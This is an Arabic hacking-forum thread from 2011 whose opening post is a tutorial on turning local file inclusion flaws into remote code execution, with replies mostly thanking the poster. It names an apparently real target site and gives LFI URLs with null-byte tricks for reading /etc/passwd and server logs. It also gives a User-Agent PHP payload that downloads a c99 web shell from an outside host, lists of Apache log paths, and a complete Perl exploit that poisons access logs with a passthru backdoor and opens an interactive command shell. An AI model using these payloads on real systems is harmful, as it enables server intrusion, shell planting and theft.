يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-27-2011, 10:30 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.MeRo
 

 

 
إحصائية العضو





Mr.MeRo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.MeRo is on a distinguished road

افتراضي شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل




السلام عليكم ورحمة الله وبركاته




شرح كتابي رفع الشيل

نبدا اول حاجه هنحتاج اضافه فى الفيرفوكس : User-Agent switcher
بعد التحميل تقوم بأضافه يوزر جديد


وتقوم بتعديل كود User Agent

الى موجود بكود مثلا سحب الشيل علي السيرفر
كود PHP:
<? passthru ('wget http://zone-t.org/upload/txt/c99.txt -O x.php'?>
لحد كدا كويس
نسحب etc/passwd علشان تتاكد ان الموقع مصاب

كويس نيجي لطريقه التطبيق علي سيرفر مركب سي بنل

كود PHP:
http://www.upworldgov.org/oms/oms.php?loc=/etc//passwd%00 
تمام

بنشوف الدومين بتاع الموقع المصاب وهوه
upworldgov.org
نجيب يوزر الموقع عن طريق عرض الخطأ بتاع الانكلود
كود PHP:
http://www.upworldgov.org/oms/oms.php?loc=./ 
تمام دلواتى تأكتف اليوزر الى انت كريته في الـ user agent من ادوات > User agnet > حدد اليوزر
تمام
نعمل رفرش للصفحه

ونروح علي ملف الـ log بتاع الدومين علشان الشيل يتسحب

بيكون مثال الوج كدا
كود PHP:
/usr/local/apache/domlogs/user/domain.com 
نقوم بتغير البينات يصبح التطبيق كدا
كود PHP:
http://www.upworldgov.org/oms/oms.php?loc=/usr/local/apache/domlogs/upworldg/upworldgov.org%00 
متنساش الـ %00 سعات بتحتجها في بعض السيرفرات كدا تم سحب الشيل تروح علي المكان الى فيه ملف تغيره بـ x.php الى حطينها في الـ user agnet

تم بحمد الله نيجي بقي نرد علي الناس الى ردت في الموضوع الاول


++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++

RO0OTMAN

حبيبي يا كبير
وحشنى ياض والله
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++
جبروت هكر

يعطييك العافيه

الترقيع : تعطيل دوال تنفيذ الاوامر

ماقصرت

منور يا اخوى
حقن الـ
كود PHP:
<?php phpinfo();?>
بيدينا معلومات كافيه عن السيرفر تسمح لنا بالتخطى كمان مش كل السيرفرات بتقفل كل الدوال ولو قفلت كل الدوال اكيد في دوال مثلا استعراض سورس صفحه كدا انت هكر وفاهم كويس الاختراق مش تطبيق لشرح واحد او اتنين كل واحد وله تفكير وعقليه بيستخدمها علشان يوصل لهدفه

++++++++++++++++++++++++++++++++++++++++++++++++++ ++
Mr.AaMa

سلمت عالطرح وفيه بعد
/var/log/apache2/access.log
/var/log/httpd-access.log
/var/log/lighttpd/access.log

ايختلف باختلاف اصدار الاباتشي .. دمت بود

تمام اخوي ويوجد سكربيت بريل بيفي بالغرض
كمان جمع المعلومات بيخلص الليله





كود PHP:
#!/usr/bin/perl -w
    use LWP::UserAgent;
    use IO::Socket;
    use LWP::Simple;

    $log="../";
    @apache=(
    "../../../../../var/log/httpd/access_log",
    "../apache/logs/access.log",
    "../../apache/logs/access.log",
    "../../Apache2.2/logs/access.log",
    "../../../../apache/logs/access.log",
    "../../../../../apache/logs/access.log",
    "../logs/access.log",
    "../../logs/access.log",
    "../../../logs/access.log",
    "../../../../logs/access.log",
    "../../../../../logs/access.log",
    "../../../../../etc/httpd/logs/access_log",
    "../../../../../etc/httpd/logs/access.log",
    "../../.. /../../var/www/logs/access_log",
    "../../../../../var/www/logs/access.log",
    "../../../../../usr/local/apache/logs/access_log",
    "../../../../../usr/local/apache/logs/access.log",
    "../../../../../var/log/apache/access_log",
    "../../../../../var/log/apache/access.log",
    "../../../../../var/log/access_log",
    "../../../../../var/log/access_log"
    );

    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

    print "\n==========================================\n";
    print "           LFI to RCE Exploit \n";
    print "           By CWH Underground \n";
    print "==========================================\n";
    
    if (@ARGV < 2)
    {
        print "Usage: ./xpl.pl <Host> <Path>\n";
        print "Ex. ./xpl.pl www.hackme.com /ktp/index.php?page=\n";
    }

    $host=$ARGV[0];
    $path=$ARGV[1];

    if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}
    
    print "\nTrying to Inject the Code...\n";
    $CODE="<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=stripslashes(\$_GET[cmd]);} passthru(\$_GET[cmd]);?>";
    $socket = IO::Socket::INET->new(Proto=>"tcp",   PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to   host.\n\n";
    print $socket "GET /cwhunderground "."\#\#%\$\$%\#\#".$CODE."\#\#%\$\$%\#\#"." HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    
    if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}
    
    foreach $getlog(@apache)
                {
                  chomp($getlog);
          $find= $host.$path.$getlog."%00";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
          $req = HTTP::Request->new(GET => $find);
          $res = $xpl->request($req);
          $info = $res->content;
                  if($info =~ /cwhunderground/)
                  {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}
                }
    
    print "cwh-shell# ";
    chomp( $cmd = <STDIN> );
    
    while($cmd !~ "exit") {   
             $shell= $host.$path.$log."%00&cmd=$cmd";
             $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
             $req = HTTP::Request->new(GET => $shell);
             $res = $xpl->request($req);
             $info = $res->content; 
                 if ($info =~ /\#\#%\$\$%\#\#(.*?)\#\#%\$\$%\#\#/sg) 
                 {print $1;}
             print "cwh-shell# ";
             chomp( $cmd = <STDIN> ); 
    }


مع تيحاتى ميرو


avp jp,dg eyvhj LFI hgn RCE ,lkih ll;k jvtu adg

   

رد مع اقتباس
قديم 09-27-2011, 11:05 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل


بارك الله فيك حبيبي ^^
الشرح شفتووا من قبل ؛)

   

رد مع اقتباس
قديم 09-27-2011, 01:57 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








دام علاء العماد غير متواجد حالياً

إرسال رسالة عبر Skype إلى دام علاء العماد

 

 

إحصائية الترشيح

عدد النقاط : 10
دام علاء العماد is on a distinguished road

افتراضي رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل


بارك الله فيك يا أخي الكريم و جزاك الله عنا خير الجزاء

   

رد مع اقتباس
قديم 09-27-2011, 11:02 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو





آدم الكندي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
آدم الكندي is on a distinguished road

افتراضي رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل


موضوع رائع جدااا.. من شخص اروع ... الف شكر بس لو سمحت فكرة سكربت البيرل لم افهمها .. ياريت لو يكون هناك فديو او شرح لفهم خطوات عمل السكربت تحياتي لك

   

رد مع اقتباس
قديم 09-28-2011, 12:00 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو





آدم الكندي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
آدم الكندي is on a distinguished road

افتراضي رد: شرح تحويل ثغرات LFI الى RCE ومنها ممكن ترفع شيل


لو كنت مكمل الشرح ورافع شل ... كان اصبح الموضوع قنبله ... تحياتي يابطل

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:04 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0